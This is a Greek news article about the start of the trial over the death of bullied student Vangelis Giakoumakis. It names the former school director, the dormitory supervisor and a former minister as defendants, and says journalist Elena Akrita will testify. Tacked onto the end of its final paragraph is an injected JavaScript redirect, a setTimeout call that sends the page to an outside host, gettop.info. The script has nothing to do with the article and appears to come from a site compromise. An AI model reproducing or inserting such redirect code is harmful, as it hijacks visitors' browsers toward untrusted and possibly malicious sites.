Ξεκινά η δίκη για τον Βαγγέλη Γιακουμάκη – Μάρτυρας η Έλενα Ακρίτα

0
5

 

Tην Πέμπτη 20 Οκτωβρίου ξεκινά η δίκη για τον θάνατο του Βαγγέλη Γιακουμάκη. Ο φοιτητής της Γαλακτοκομικής Σχολής Ιωαννίνων δεχόταν εκφοβισμό και σωματική βία απο συμφοιτητές του «σκληρούς Κρητικούς». Βρέθηκε νεκρός σε ένα χωράφι λίγο πιο μακριά από τις εγκαταστάσεις της Γαλακτοκομικής Σχολής Ιωαννίνων.

Κατηγορούμενοι για παράβαση καθήκοντος είναι ο πρώην διευθυντής της σχολής αλλά και η προϊσταμένη της εστίας, καθώς ουσιαστικά ανέχτηκαν τη συμπεριφορά των «σκληρών Κρητικών», που ασκούσαν βία σε βάρος του Βαγγέλη Γιακουμάκη, αλλά και ο πρώην υπουργός και βουλευτής Χρήστος Μαρκογιαννάκης, που φέρεται να είχε παρέμβει στη διεύθυνση της σχολής για την ήπια μεταχείριση φοιτητή που αντιμετώπιζε πειθαρχική ποινή.

Μάρτυρας στη δίκη θα προσέλθει η δημοσιογράφος και σεναριογράφος, Έλενα Ακρίτα, η οποία έχει λάβει δημοσίως θέση στην υπόθεση ενώ είχε καταθέσει για την υπόθεση στις Αρχές. Τώρα αναμένεται να παρουσιαστεί στο Τριμελές Εφετείο Πλημμελειοδικών Ιωαννίνων όπου θα καταθέσει για όσα γνωρίζει.

Η Έλενα Ακρίτα είχε σχολιάσει από την πρώτη στιγμή της ανεύρεσης του σώματος του άτυχου φοιτητή ότι σε κάθε περίπτωση υπάρχουν ευθύνες πολλών, ακόμη και εάν πρόκειται για αυτοκτονία, δείχνοντας ως υπεύθυνους όσους άσκησαν bullying, σε βάρος του, αλλά και όσους το επέτρεψαν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here